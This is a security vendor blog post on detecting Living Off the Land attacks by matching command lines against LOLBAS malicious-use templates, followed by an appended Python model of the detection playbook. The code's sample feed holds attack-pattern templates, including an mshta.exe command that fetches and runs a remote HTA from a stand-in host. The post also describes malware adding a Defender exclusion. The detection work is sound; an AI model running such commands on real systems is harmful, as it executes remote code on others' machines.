# Playbook Of The Week - Fending Off Living Off the Land Attacks

By [Arik Day](https://www.paloaltonetworks.com/blog/author/arik-day/?ts=markdown "Posts by Arik Day"), Aug 24, 2023, 5 minutes

Tags: [Playbook of the Week](https://www.paloaltonetworks.com/blog/security-operations/category/playbook-of-the-week/?ts=markdown), [Automation](https://www.paloaltonetworks.com/blog/tag/automation/?ts=markdown), [command-line analysis](https://www.paloaltonetworks.com/blog/tag/command-line-analysis/?ts=markdown), [Cortex XSOAR](https://www.paloaltonetworks.com/blog/tag/cortex-xsoar/?ts=markdown), [LOLBAS](https://www.paloaltonetworks.com/blog/tag/lolbas/?ts=markdown), [security orchestration](https://www.paloaltonetworks.com/blog/tag/security-orchestration/?ts=markdown)

### **Introduction - Living Off the Land Attacks**

[Living Off the Land (LOTL)](https://www.paloaltonetworks.com/cyberpedia/what-are-fileless-malware-attacks) attacks are used by attackers to evade detection by relying on the system's own native utilities, scripting languages, or trusted applications rather than on custom or malicious code that may raise suspicion. The use of native tools (Living Off the Land binaries, or LOLBins) also makes LOTL attacks far harder to detect with traditional detection methods.

Real-world examples of how LOTL attacks are executed can be found in multiple threat research reports, such as the [Threat Brief: Ongoing Russia and Ukraine Cyber Activity](https://unit42.paloaltonetworks.com/ukraine-cyber-conflict-cve-2021-32648-whispergate/) published by Unit 42, which shows WhisperGate malware using techniques that are documented in the LOLBAS (Living Off the Land Binaries and Scripts) feed. The report highlights the use of the LOLBin 'wscript.exe' to execute a VBS script, which in turn invokes PowerShell to establish a Windows Defender exclusion path. Wscript.exe is just one example of the many LOLBins documented in the LOLBAS feed.

### **The Importance of Early Detection: Preventing Damage from Living Off The Land Attacks**

Since identifying LOTL attacks can be a highly complex task, these attacks can enable bad actors to persistently access systems, siphon off sensitive data, or move laterally within a network without drawing attention to themselves. To prevent data breaches and protect crucial assets, including intellectual property, personal information, and other sensitive data, from unauthorized access or exposure, it is imperative to have efficient methods in place to detect LOTL attacks.
### **What is the Living Off the Land Binaries and Scripts (LOLBAS) Project?**

The LOLBAS project catalogs the binaries, scripts, and libraries of common operating systems that can be utilized for executing Living Off The Land techniques. All LOLBins in the LOLBAS repository can be imported as tool type indicators into the Cortex XSOAR Threat Intelligence Management module (TIM) via the [LOLBAS Feed Integration](https://cortex.marketplace.pan.dev/marketplace/details/FeedLOLBAS/). Each LOLBin tool indicator contains the following information:

* LOLBin name
* MITRE ATT\&CK reference to the relevant attack patterns
* LOLBin paths
* Detections - links to Sigma and YARA rules if they exist
* Commands - template of a malicious use of the tool

![Fig 1: LOLBin tool indicator layout](https://www.paloaltonetworks.com/blog/wp-content/uploads/2023/08/word-image-303060-1.png)

Fig 1: LOLBin tool indicator layout

### **Utilizing LOLBAS for Command-Line Analysis**

The goal is to verify whether the provided LOLBin command-line argument exhibits similarity to the known malicious patterns outlined in the LOLBAS repository. By comparing the given argument to the documented patterns of potentially harmful activities, we aim to identify any potentially malicious behavior associated with the LOLBin command. This analysis helps ensure the security and integrity of system operations by proactively detecting potential threats.
For example, consider a comparison between the following mshta.exe LOLBin command-line argument, which is part of a security incident:

![](https://www.paloaltonetworks.com/blog/wp-content/uploads/2023/08/blog-one.png)

and the mshta.exe malicious argument pattern from LOLBAS:

![](https://www.paloaltonetworks.com/blog/wp-content/uploads/2023/08/blog-2.png)

### **Key Playbook Automations**

**StringSimilarity**

The StringSimilarity automation uses the SequenceMatcher class from Python's difflib module to compare strings and return a similarity score from 0 to 1 (1 is identical). The automation outputs all of the strings that have a score equal to or greater than a given threshold.

![Fig 2: StringSimilarity automation Inputs](https://www.paloaltonetworks.com/blog/wp-content/uploads/2023/08/word-image-303060-2.png)

Fig 2: StringSimilarity automation Inputs

![Fig 3: StringSimilarity output](https://www.paloaltonetworks.com/blog/wp-content/uploads/2023/08/word-image-303060-3.png)

Fig 3: StringSimilarity output

### **Playbook - Search For Suspicious LOLBin Executions**

The generic playbook "[Command-line Analysis](https://xsoar.pan.dev/docs/reference/playbooks/command-line-analysis)" is enhanced with the sub-playbook "Search For Suspicious LOLBin Executions".
The sub-playbook executes the following steps:

* Receive the relevant process names and process command-line arguments from its inputs
* Check whether the process image name exists in the LOLBAS Feed
* Compare the provided command-line arguments with the template of a malicious use of the tool from the LOLBAS Feed
* If the similarity score is equal to or greater than the given threshold, set the provided command-line argument in the playbook outputs
* A suspicious LOLBin execution found this way affects the Command-Line Analysis playbook's final verdict

![Fig 4: Search for Suspicious LOLBin Executions playbook](https://www.paloaltonetworks.com/blog/wp-content/uploads/2023/08/word-image-303060-4.png)

Fig 4: Search for Suspicious LOLBin Executions playbook

### **Conclusion**

Harnessing the power of LOLBAS for command-line analysis in conjunction with XSOAR provides a robust approach to enhancing security and detecting potential threats. LOLBAS serves as a valuable resource for documenting legitimate binaries and scripts that can be repurposed for Living Off The Land techniques. Integrating the LOLBAS feed into XSOAR's Threat Intelligence Management module allows for seamless ingestion of LOLBins as tool indicators, enabling efficient analysis and identification of suspicious command-line activities. By leveraging this combination of LOLBAS and XSOAR, organizations can strengthen their security posture and stay one step ahead of potential adversaries in the ever-evolving landscape of cybersecurity.

**Glossary:**

* Living Off the Land (LOTL): threat actors using legitimate system tools during an attack.
* Living Off the Land binaries (LOLBins): the native tools used by threat actors in an attack.
* Living Off the Land Binaries and Scripts (LOLBAS): a catalog of the binaries, scripts, and libraries of common operating systems that can be utilized for executing Living Off The Land techniques.
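The StringSimilarity step and the sub-playbook's lookup-compare-threshold flow, as an added stand-alone model that is not the post's or XSOAR's own code: the in-memory `LOLBAS_FEED`, its templates, and the incident command lines are constructed here, and `normalize()` is an assumption added so that casing and spacing do not move the difflib score.

```python
"""Added example (not the post's or XSOAR's own code): a stand-alone model of the
"Search For Suspicious LOLBin Executions" sub-playbook and its StringSimilarity step.
The LOLBAS feed, the templates and the incident command lines are all constructed here."""
from difflib import SequenceMatcher
from pathlib import PureWindowsPath

# Constructed stand-in for the LOLBAS tool indicators ingested into TIM, carrying
# the fields the post lists for a tool indicator (name, paths, malicious-use commands).
LOLBAS_FEED = [
    {
        "name": "mshta.exe",
        "paths": [r"C:\Windows\System32\mshta.exe", r"C:\Windows\SysWOW64\mshta.exe"],
        "commands": ["mshta.exe https://example.invalid/payload.hta"],  # constructed template
    },
    {
        "name": "wscript.exe",
        "paths": [r"C:\Windows\System32\wscript.exe"],
        "commands": [r"wscript.exe C:\Users\Public\script.vbs"],  # constructed template
    },
]


def normalize(text: str) -> str:
    """Assumed pre-processing: case-fold and collapse whitespace so padding does not move the score."""
    return " ".join(text.lower().split())


def string_similarity(a: str, b: str) -> float:
    """Same measure the StringSimilarity automation uses: difflib ratio, 0.0 to 1.0 (1.0 identical)."""
    return SequenceMatcher(None, normalize(a), normalize(b)).ratio()


def lookup_lolbin(process_name: str):
    """Step 2: does the process image name exist in the feed? Accepts a full path or a bare name."""
    image = PureWindowsPath(process_name).name.lower()
    return next((t for t in LOLBAS_FEED if t["name"].lower() == image), None)


def search_suspicious_lolbin(process_name: str, command_line: str, threshold: float = 0.6):
    """Steps 2-4: compare the command line with each template and keep scores >= threshold."""
    tool = lookup_lolbin(process_name)
    if tool is None:
        return []  # not a LOLBin: nothing to compare, the final verdict is unaffected
    hits = [
        {"tool": tool["name"], "template": tpl, "score": round(string_similarity(command_line, tpl), 3)}
        for tpl in tool["commands"]
    ]
    return sorted((h for h in hits if h["score"] >= threshold), key=lambda h: h["score"], reverse=True)


if __name__ == "__main__":
    # Constructed incident data: an mshta.exe process whose command line is close to the template.
    incident_image = r"C:\Windows\System32\mshta.exe"
    incident_cmdline = "MSHTA.EXE  https://example.invalid/update.hta"
    for hit in search_suspicious_lolbin(incident_image, incident_cmdline, threshold=0.6):
        print(f"suspicious {hit['tool']} execution: score {hit['score']} vs '{hit['template']}'")
```

A process that is not in the feed yields no hits, and a LOLBin whose arguments diverge from every template stays below the threshold, so only the near-template case reaches the playbook outputs.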